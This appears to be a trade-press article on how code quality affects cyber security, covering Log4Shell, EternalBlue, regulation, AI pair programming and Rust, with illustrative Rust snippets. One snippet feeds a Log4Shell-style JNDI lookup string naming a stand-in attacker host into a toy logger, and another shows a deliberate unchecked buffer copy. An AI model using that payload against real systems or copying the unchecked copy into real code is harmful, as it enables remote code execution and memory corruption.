
It is widely recognised among the IT security community that there is a direct correlation between the quality of code – measured as the number of coding errors per thousand lines of code – and cyber security. Simply put, the more bugs in code, the greater the chance they will be exploited as an attack vector. Pressure to improve code quality is being driven internally by business and IT leaders, and externally by regulators and policy-makers.
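As a rough illustration of that metric, defect density is conventionally expressed as defects per thousand lines of code (KLOC). The sketch below is illustrative only, and the figures in it are invented:

```rust
// Illustrative sketch of the defect-density metric: defects per KLOC.
// The numbers are invented for the example.
fn defects_per_kloc(defects: u32, lines_of_code: u32) -> f64 {
    defects as f64 / (lines_of_code as f64 / 1000.0)
}

fn main() {
    // e.g. 42 confirmed defects found in a 60,000-line code base
    println!("{:.2} defects per KLOC", defects_per_kloc(42, 60_000)); // 0.70
}
```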

There are direct and indirect benefits to improving the quality of programming. Beyond the cyber security risk, coding errors that reach production environments are far more costly to fix than those identified early in a project’s lifecycle. Poor-quality software also affects customer and employee experience, which can hamper productivity and lead to lost revenue.

IDC’s recently published Worldwide semiannual software tracker points to demand for improved resiliency: spending on software quality and lifecycle tools grew by over 26% in constant currency.

Highly publicised exploits such as Log4Shell – which made use of a vulnerability in Log4j, the Java-based logging utility embedded in numerous applications – sent shockwaves across the tech sector, highlighting the risk of embedding third-party code in software development projects. These third-party components, web services and libraries speed up software development, not only saving time, but also lowering the volume of coding errors, because programmers can rely on others to create the components they need rather than developing everything from scratch.

The more popular libraries are exercised in hundreds of thousands of projects, which means bugs can be ironed out quickly. But, as was the case with Log4Shell, some can remain unidentified, so the first an organisation hears about the problem is when it is being exploited.
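To illustrate the class of flaw behind Log4Shell, the sketch below is a hypothetical logger – not Log4j itself – that evaluates ${...} lookup expressions found in the data it is asked to record, turning attacker-supplied input into behaviour:

```rust
// Hypothetical sketch of the Log4Shell class of bug: a logger that
// interprets lookup expressions embedded in the message it records.
// Log4j's JNDI lookups behaved analogously; this is not Log4j code.

fn resolve_lookup(expr: &str) -> String {
    // In Log4j, a ${jndi:ldap://attacker.example/x} expression here
    // triggered a network fetch and remote class loading.
    format!("<resolved {expr}>")
}

fn log_message(msg: &str) {
    // The flaw: the logger scans the *data* it is given for ${...}
    // expressions and evaluates them, turning data into code.
    let rendered = match (msg.find("${"), msg.rfind('}')) {
        (Some(start), Some(end)) if end > start + 1 => {
            let expr = &msg[start + 2..end];
            msg.replace(&msg[start..=end], &resolve_lookup(expr))
        }
        _ => msg.to_string(),
    };
    println!("LOG: {rendered}");
}

fn main() {
    // Attacker-controlled input, e.g. a User-Agent header, reaches the logger.
    log_message("user agent: ${jndi:ldap://attacker.example/x}");
    log_message("plain message, logged as-is");
}
```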

In a bid to protect the internet and critical national infrastructure, the US government’s National Cybersecurity Strategy places the responsibility for IT security on the organisations that manage and run digital ecosystems, shifting the burden of poor cyber security away from end users and on to the companies operating these platforms.

In a blog discussing the new rules, Tidelift warns that one of the biggest impacts organisations are likely to see from the new policy is a more overt, active government approach to improving cyber security through increased regulation and mandatory requirements.

To remain compliant with the latest standards, Joseph Foote, a cyber security expert at PA Consulting, says organisations in regulated sectors must provide proof that their key infrastructure has undergone a form of in-depth security assurance. “If these companies are not compliant, they risk fines and penalties, and insurance providers may no longer be willing to renew contracts,” he adds.

Reducing risk and potential financial and reputational impact will be at the forefront of many businesses’ minds. This applies to software, how it is developed, and the security of the third-party services an organisation relies on to achieve its business objectives.

Security, from a coding perspective, starts with a set of guidelines, which Foote says are intended to govern and enforce a methodology to be followed when implementing new software-enabled features. These guidelines, he says, range from simple suggestions, such as ensuring documentation is created when expanding the existing code base, to detailing the structure and layout of the code itself.

Quality control

In Foote’s experience, developers often align their code bases with a specific design paradigm to futureproof them, increase modularity and reduce the likelihood of mistakes caused by overall code complexity. But even the most robust guidelines can still allow bugs and mistakes into the final code, although the frequency of issues typically lessens as the guidelines mature.

“Some of the vulnerabilities that have caused the biggest impact can be traced back to oversights in secure coding practices, and some of the most problematic weaknesses in our most popular software could have been caught with strict quality control and secure coding guidelines,” he says.

Take EternalBlue, which targeted a vulnerability in Microsoft’s Windows operating system and its core components to allow execution of malicious code. Although the vulnerability EternalBlue exploits – addressed by Microsoft in security bulletin MS17-010 – affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyber attacks.

In a post describing EternalBlue, security firm Avast cites a New York Times article alleging that the US National Security Agency (NSA) took a year to identify the bug in the Windows operating system, then developed EternalBlue to exploit the vulnerability. According to the article, the NSA used EternalBlue for five years before alerting Microsoft to its existence. The NSA was itself breached, and EternalBlue found its way into the hands of hackers, leading to the WannaCry ransomware attack.

As Foote points out, EternalBlue was a coding issue.

Charles Beadnall, chief technology officer (CTO) at GoDaddy, urges IT leaders to make sure the code being developed is written to the highest level of quality.

As code becomes more complex and makes use of third-party services, software libraries and open source components, it becomes harder to identify coding issues and take remedial action.

A survey of 1,300 CISOs in large enterprises with over 1,000 employees, conducted by Coleman Parkes and commissioned by Dynatrace in March 2023, found that over three-quarters (77%) of CISOs say it’s a significant challenge to prioritise vulnerabilities because of a lack of information about the risk they pose to their environment.

Discussing the results, Bernd Greifeneder, CTO at Dynatrace, says: “The growing complexity of software supply chains and the cloud-native technology stacks that provide the foundation for digital innovation make it increasingly difficult to quickly identify, assess and prioritise response efforts when new vulnerabilities emerge.

“These tasks have grown beyond human ability to manage. Development, security and IT teams are finding that the vulnerability management controls they have in place are no longer adequate in today’s dynamic digital world, which exposes their businesses to unacceptable risk.”

Reducing the risk of poor software quality

Beadnall says one of the most important things with security is to make sure there are controls in place for what you’re deploying and how you are monitoring it.

He is a big fan of running coding projects like a lab experiment, where a hypothesis is tested and the results are measured and compared against a control dataset. “Running experiments is helpful in terms of quantifying and classifying the types of code you’re rolling out, the impact to customers and better understanding deployment,” he says.
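A minimal sketch of that experiment-style rollout, assuming a simple error-rate comparison between a control and a treatment code path (the bucket sizes and guardrail threshold here are invented for the example):

```rust
// Sketch of an experiment-style rollout: route a fraction of traffic to
// the new code path, then compare its error rate against the control
// before widening the deployment. Figures and threshold are illustrative.

struct Bucket {
    requests: u64,
    errors: u64,
}

impl Bucket {
    fn error_rate(&self) -> f64 {
        if self.requests == 0 {
            0.0
        } else {
            self.errors as f64 / self.requests as f64
        }
    }
}

fn main() {
    let control = Bucket { requests: 100_000, errors: 120 }; // existing code path
    let treatment = Bucket { requests: 10_000, errors: 31 }; // new code path

    let delta = treatment.error_rate() - control.error_rate();

    // Hypothetical guardrail: abort the rollout if the new path is more
    // than 0.1 percentage points worse than the control.
    if delta > 0.001 {
        println!("Roll back: error rate regressed by {:.3} percentage points", delta * 100.0);
    } else {
        println!("Proceed: error rate within guardrail ({:.3} percentage points)", delta * 100.0);
    }
}
```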

Trustwave researchers recently tested ChatGPT’s ability to write code and identify common programmer errors such as buffer overflow, which can easily be exploited by hackers. Karl Sigler, threat intelligence manager at Trustwave, expects ChatGPT and other generative AI systems to become part of the software development lifecycle.
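For reference, the sketch below illustrates the buffer overflow class of bug Trustwave’s researchers probed for – written here in Rust, where the C-style mistake has to be reproduced deliberately inside an unsafe block:

```rust
use std::ptr;

// Illustrative sketch of a buffer overflow: copying attacker-sized input
// into a fixed-size buffer without a length check.
fn copy_into_buffer(input: &[u8]) {
    let mut buf = [0u8; 8]; // fixed-size destination buffer

    // Safe Rust would bounds-check: buf[..input.len()].copy_from_slice(input)
    // panics cleanly if the input is longer than the buffer.

    // The unsafe variant reproduces the C-style mistake: no length check,
    // so input.len() > 8 would write past the end of buf - the classic
    // overflow an attacker exploits for code execution.
    unsafe {
        ptr::copy_nonoverlapping(input.as_ptr(), buf.as_mut_ptr(), input.len());
    }
    println!("copied {} bytes into an {}-byte buffer", input.len(), buf.len());
}

fn main() {
    copy_into_buffer(b"ok"); // fits: 2 bytes into an 8-byte buffer
    // copy_into_buffer(b"0123456789abcdef"); // 16 bytes: undefined behaviour
}
```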

Beadnall sees generative AI as something that could be used to oversee the work developers do, in the same way as pair programming. “We are experimenting with a number of different techniques where AI is being used as a pair programmer to make sure we are writing higher-quality code,” he says. “I think this is a very logical first step.”

In the short term, the tools themselves are improving, to make coding more secure. “Automation and security are at the heart of enablement. AI tools enable workers to create and produce in new, creative ways, while security is the underlying fortification that allows their introduction to the enterprise,” says Tom Vavra, head of IDC’s data and analytics team, European software.

PA’s Foote says companies with large development teams are gradually making the transition to safer standards and safer programming languages, such as Rust. This partially combats the problem by enforcing a secure-by-design paradigm in which any operation deemed unsafe must be explicitly declared, decreasing the likelihood of insecure operations slipping in through oversight.

“Secure-by-design paradigms are a leap forward in development practices, along with modern advancements in secure coding practices,” he adds.
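A minimal sketch of what that explicit declaration looks like in Rust – a safe, bounds-checked API alongside an unchecked variant that will not compile outside an unsafe block:

```rust
// In Rust, operations the compiler cannot prove safe must be wrapped in
// an explicit `unsafe` block, so risky code is declared, not implicit.

fn third_element(values: &[i32]) -> Option<i32> {
    // Safe API: bounds-checked, returns None instead of reading bad memory.
    values.get(2).copied()
}

fn third_element_unchecked(values: &[i32]) -> i32 {
    // The unchecked variant compiles only inside an `unsafe` block,
    // forcing the programmer (and reviewers) to acknowledge the risk.
    unsafe { *values.get_unchecked(2) }
}

fn main() {
    let data = [10, 20, 30];
    assert_eq!(third_element(&data), Some(30));
    assert_eq!(third_element_unchecked(&data), 30);

    let short = [1];
    assert_eq!(third_element(&short), None); // safe path degrades gracefully
    // third_element_unchecked(&short) would be undefined behaviour - and
    // the `unsafe` keyword is what makes that risk visible in review.
}
```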

To demonstrate that their organisations are secure and trustworthy, Foote believes IT leaders will need to run detail-oriented security assessments.
